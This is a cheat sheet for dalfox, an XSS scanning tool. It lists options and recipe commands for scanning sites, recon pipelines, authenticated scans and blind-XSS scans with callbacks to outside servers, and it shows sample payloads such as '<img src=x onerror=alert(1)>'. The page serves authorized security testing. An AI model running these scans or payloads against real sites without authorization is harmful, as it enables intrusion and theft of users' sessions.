← Cheat Sheets / Web

dalfox

Fast XSS scanner and parameter analyzer. Go-based.

Quickstart

# Single URL
dalfox url "https://target.com/page?q=test"

# From file
dalfox file urls.txt

# Pipe from other tools
cat params.txt | dalfox pipe

Core Concepts

Concept Description
Parameter analysis Find reflections
XSS detection Test various payloads
BAV Blind XSS with callback
DOM DOM-based XSS detection

Syntax

dalfox url <url> [options]
dalfox file <file> [options]
dalfox pipe [options]

Options

Target

Option Description
url <url> Single URL
file <file> URL list
pipe Read from stdin
-p <param> Test specific parameter

Detection

Option Description
--deep-domxss Deep DOM XSS scan
--follow-redirects Follow redirects
--mining-dict Use dictionary mining
--mining-dom Mine DOM sources
--only-discovery Find params only
--skip-bav Skip blind XSS

Blind XSS

Option Description
-b <url> Blind XSS callback
--blind <url> Same as -b

Request

Option Description
-H <header> Custom header
--cookie <c> Cookie
--data <d> POST data
--proxy <url> Proxy
--user-agent <ua> User agent

Output

Option Description
-o <file> Output file
--format <f> Format (plain, json)
--silence Silence mode
-v Verbose

Performance

Option Description
-w <n> Workers (default 40)
--delay <ms> Delay between requests
--timeout <sec> Timeout

Recipes

Basic XSS Scan

# Single URL
dalfox url "https://target.com/search?q=test"

# Specific parameter
dalfox url "https://target.com/search?q=test&id=1" -p q

# Multiple URLs
dalfox file urls.txt

With Blind XSS

# With callback server
dalfox url "https://target.com/page?q=test" -b "https://your-server.com/xss"

# With interactsh
dalfox url "https://target.com/page?q=test" -b "https://abc123.oast.fun"

POST Requests

# POST data
dalfox url "https://target.com/submit" --data "name=test&email=test@test.com"

# Specific POST param
dalfox url "https://target.com/submit" --data "name=test" -p name

Pipeline

# From paramspider/arjun
cat params.txt | dalfox pipe

# From katana
katana -u https://target.com -silent | dalfox pipe

# With grep for URLs with params
katana -u https://target.com -silent | grep "?" | dalfox pipe

# Full pipeline
waybackurls target.com | grep "?" | dalfox pipe -b "https://blind.server"

Custom Payloads

# Custom payload file
dalfox url "https://target.com/page?q=test" --custom-payload payloads.txt

# Payload format (one per line):
# <script>alert(1)</script>
# <img src=x onerror=alert(1)>

Through Proxy

# Burp/Caido
dalfox url "https://target.com/page?q=test" --proxy "http://127.0.0.1:8080"

With Authentication

# Cookie
dalfox url "https://target.com/page?q=test" --cookie "session=abc123"

# Header
dalfox url "https://target.com/page?q=test" -H "Authorization: Bearer token"

Discovery Only

# Find reflections without testing XSS
dalfox url "https://target.com/page?q=test" --only-discovery

# Mining for parameters
dalfox url "https://target.com/page" --mining-dict

Output & Parsing

# JSON output
dalfox url "https://target.com/page?q=test" --format json -o results.json

# Parse results
cat results.json | jq -r '.[] | select(.type == "V") | .data'

# Plain text
dalfox url "https://target.com/page?q=test" -o results.txt

Troubleshooting

Issue Solution
No vulns found Increase payloads, check manually
WAF blocking Use proxy, reduce speed
False positives Verify in browser
Timeout Increase --timeout

References

← Retour aux cheat sheets